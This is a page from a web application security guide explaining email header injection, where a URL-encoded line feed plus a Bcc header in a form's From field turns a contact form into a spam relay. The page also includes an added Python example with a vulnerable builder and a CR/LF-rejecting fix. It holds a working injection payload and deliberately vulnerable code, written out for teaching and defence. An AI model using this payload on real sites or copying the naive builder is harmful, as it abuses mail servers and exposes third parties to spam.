Web application security - the fast guide 1.1 | Page 145

Chapter 7 - Attack execution (3)

Attack process: the original form submission is as follows:

To: admin@vulnerableSite.com
From: legitimateUser@legitimateServer.com
Subject: Site problem
Confirm Order page doesn't load

The attacker simply appends a Bcc header to the user email address (the %0a is a URL-encoded line feed, which the application decodes into a new header line), and the same message is then sent to the listed addresses:

%0aBcc:theSpamVictim@spammedCompany.com

The attacker can also supply the spam message contents, so the full SMTP request will be as follows:

To: admin@vulnerableSite.com
From: whatever@whateverServer.com%0aBcc:theSpamVictim@spammedCompany.com
Subject: SPAAAAAM SUBJECT
Hello dear receiver, this is the spam message contents.
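The header-injection sequence above, as an added Python example that is not from the book: the naive builder shows how the decoded %0a turns the From value into two header lines, and the hardened builder rejects any CR/LF before the message is assembled. The addresses are the page's placeholder values; the function names are assumptions.

```python
from urllib.parse import unquote

# Constructed sample field values mirroring the page's form (placeholder addresses).
LEGIT_FROM = "legitimateUser@legitimateServer.com"
INJECTED_FROM = "whatever@whateverServer.com%0aBcc:theSpamVictim@spammedCompany.com"

def decode_form_field(raw: str) -> str:
    """Apply the URL-decoding the web server does before the app sees the value."""
    return unquote(raw)

def headers_naive(to_addr: str, from_addr: str, subject: str) -> list[str]:
    """Vulnerable pattern: decoded values pasted straight into the header block.
    Returns the header lines the mail server would actually receive."""
    raw = f"To: {to_addr}\nFrom: {from_addr}\nSubject: {subject}\n"
    return raw.splitlines()

def check_header_value(value: str) -> str:
    """Hardened pattern: a header value must stay on one line, so any CR or LF
    (what %0d / %0a decode to) is rejected instead of becoming a new header."""
    if "\r" in value or "\n" in value:
        raise ValueError("CR/LF in header value: possible SMTP header injection")
    return value

def headers_safe(to_addr: str, from_addr: str, subject: str) -> list[str]:
    return [
        f"To: {check_header_value(to_addr)}",
        f"From: {check_header_value(from_addr)}",
        f"Subject: {check_header_value(subject)}",
    ]

def submission_rejected(raw_to: str, raw_from: str, raw_subject: str) -> bool:
    """True when the hardened builder refuses the (decoded) form submission."""
    try:
        headers_safe(decode_form_field(raw_to), decode_form_field(raw_from),
                     decode_form_field(raw_subject))
    except ValueError:
        return True
    return False

if __name__ == "__main__":
    to_addr = "admin@vulnerableSite.com"
    for line in headers_naive(to_addr, decode_form_field(INJECTED_FROM), "SPAAAAAM SUBJECT"):
        print(line)  # the injected Bcc: shows up as its own header line
    print("rejected:", submission_rejected(to_addr, INJECTED_FROM, "SPAAAAAM SUBJECT"))
```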